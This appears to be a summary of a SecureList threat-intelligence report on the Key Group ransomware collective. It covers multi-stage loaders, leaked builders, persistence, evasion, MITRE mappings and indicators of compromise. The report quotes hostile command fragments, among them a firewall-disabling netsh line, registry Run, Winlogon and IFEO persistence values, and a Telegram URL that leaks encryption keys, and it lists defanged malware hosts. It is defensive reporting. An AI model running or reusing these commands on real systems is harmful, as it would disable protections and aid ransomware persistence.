Threat Research

“Key Group: A New Ransomware Collective Leveraging Leaked Builders”

SecureList

Key Group (keygroup777) uses publicly leaked ransomware builders (Chaos, Annabelle, Hakuna Matata, RuRansom, NoCry, etc.) delivered via multi-stage loaders (LNK → obfuscated PowerShell → SFX droppers) and hosted artifacts on GitHub and public file hosts. Their samples implement persistence (startup entries, Run/Winlogon modifications), multiple evasions (disabling Defender/Firewall, modifying IFEO, deleting shadow copies), and various encryption/wiper behaviors. #KeyGroup #Chaos

Keypoints

  • Delivery used multi-stage loaders: LNK files with obfuscated PowerShell that fetch SFX archives, which unpack loaders and final ransomware binaries.
  • Primary hosting and C2 artifacts observed on public GitHub repositories (raw.githubusercontent[.]com/max444432/RMS2) and public file hosts (fastxstreamz.herokuapp[.]com).
  • Ransomware families used include Chaos, Xorist, Annabelle (with MBR locker), Slam, RuRansom (wiper), Hakuna Matata, UX-Cryptor, and Judge/NoCry, each with distinct extensions and behaviors.
  • Evasion and destructive techniques: disabling Firewall/Defender, disabling UAC/Registry Editor/Run, IFEO modifications, shadow copy deletion, and MBR locking were observed in samples (Annabelle, RuRansom, Hakuna Matata).
  • Persistence mechanisms included adding startup folder shortcuts, Run/Winlogon registry entries, file association changes, and RunOnce/CurrentUser Run keys across different ransomware variants.
  • Some variants exfiltrated or published generated encryption keys and victim identifiers to a Telegram channel URL instead of a classic C2, enabling public posting of keys (Judge/NoCry behavior).
  • Loaders used .NET WebClient.DownloadData and PowerShell download routines to pull payloads directly from GitHub/raw hosts, facilitating easy reuse and tracking of samples.

MITRE Techniques

  • [T1059.001] PowerShell – Used to execute obfuscated download and extraction commands from LNK files (‘obfuscated PowerShell command that downloaded an SFX archive’).
  • [T1059.003] Command-Line Interface – cmd.exe was used to run dropper actions and write ransom notes (‘cmd.exe /c cd “%systemdrive%UsersPublicDesktop” & … & echo […] 1>info-0v92.txt’).
  • [T1547.001] Registry Run Keys / Startup Folder – Multiple samples created startup shortcuts or registry Run entries for persistence (‘HKLMSOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRun “Alcmeter” = “C:Users[redacted]AppDataLocalTempfj6qD14qWC1unS2.exe”‘).
  • [T1543.003] Modify Existing Service – Ransomware modified Winlogon/Shell and other system entries to ensure execution at boot (‘HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Shell” = “$selfpath”‘).
  • [T1134] Access Token Manipulation – Privilege escalation was listed in TTP mapping (article lists Access Token Manipulation as a used technique), implying attempts to alter token privileges to perform elevated actions (‘Access Token Manipulation – T1134’).
  • [T1027] Obfuscated Files or Information – Payloads and dropper commands were obfuscated to hinder detection (‘obfuscated PowerShell command’).
  • [T1089] Disable or Modify System Firewall – Samples executed Netsh commands to turn off Windows Firewall (‘NetSh Advfirewall set allprofiles state off’).
  • [T1222] File and Directory Permissions Modification – Ransomware modified system settings and IFEO to prevent processes from launching normally (‘HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options[process] “Debugger” = “RIP”‘).
  • [T1003] Credential Dumping – Credential dumping was included in the TTP list, indicating attempts to harvest credentials for lateral movement or persistence (‘Credential Dumping – T1003’).
  • [T1041] Exfiltration Over Command and Control Channel – Data and generated keys were sent/published via a Telegram channel URL instead of a traditional C2 (‘hxxps://t[.]me/s/SBUkr?[username]_[generated_id]=[generated_key]’).

Indicators of Compromise

  • [File Hash] notable ransomware binaries – C2E1048E1E5130E36AF297C73A83AFF6 (warnep.exe, Chaos), DA09FCF140D3AAD0390FB7FAF7260EB5 (Hakuna Matata), and many other hashes listed in the report.
  • [File Names] dropped payloads and droppers – warnep.exe, Россия-обновление.docs.exe (RuRansom variant), telegram-raid-botnet.exe (Hakuna Matata payload).
  • [URLs / Domains] download and C2 hosts – hxxps://raw.githubusercontent[.]com/max444432/RMS2/main/ (GitHub raw hosting), hxxp://fastxstreamz.herokuapp[.]com/… (SFX/EXE hosting), and make-catherine.at.ply[.]gg (XWorm C2).
  • [Registry Keys / Startup Artifacts] persistence indicators – Run/Winlogon entries (e.g., HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun “UpdateBackup” = “$selfpath”), startup .url shortcuts in user startup folder.
  • [Extensions / Artifacts] encrypted file extensions and ransom notes – .huis_bn, .Keygroup777tg.EXE, .keygroup777tg, keygroup777.txt, and info-0v92.txt found on infected systems.

Key Group’s infection chain consistently used multi-stage loaders: a phishing-distributed LNK file executed an obfuscated PowerShell command to download an SFX self-extracting archive, which unpacked a secondary loader that fetched final payloads (examples: Chaos MD5 C910DA0BAA2E08… and Xorist MD5 E0C74416…). Some .NET loaders used WebClient.DownloadData to pull executables directly from raw.githubusercontent[.]com repositories, enabling simple rehosting and rapid distribution of multiple leaked builders and wipers.

Ransomware samples implemented multiple evasion and destructive actions before encryption or locking: disabling Firewall via NetSh, setting Defender policy keys to disable real-time protection, turning off UAC and Registry Editor, modifying Image File Execution Options (IFEO) to break specific processes, and deleting shadow copies with vssadmin. Annabelle additionally contained an MBR locker and the observed RuRansom variant behaved as a wiper; several families used AES-CBC/AES-256-CBC for file encryption and appended identifiable extensions (.huis_bn, .keygroup777tg, random 5-char extensions), while some variants encoded filenames in Base64.

Persistence was achieved through varied techniques across families: creating startup folder .url shortcuts pointing to copied executables, adding Run/Winlogon registry entries (HKLM and per-user HKU keys), altering file association keys so opening encrypted files would relaunch the binary, and adding numerous Run keys and RunOnce entries. Communication and key handling deviated from classic C2 in at least one sample (Judge/NoCry), which constructed a Telegram channel URL and posted the victim identifier and generated key there (hxxps://t[.]me/s/SBUkr?[username]_[generated_id]=[generated_key]), effectively publishing encryption metadata publicly. Read more: https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint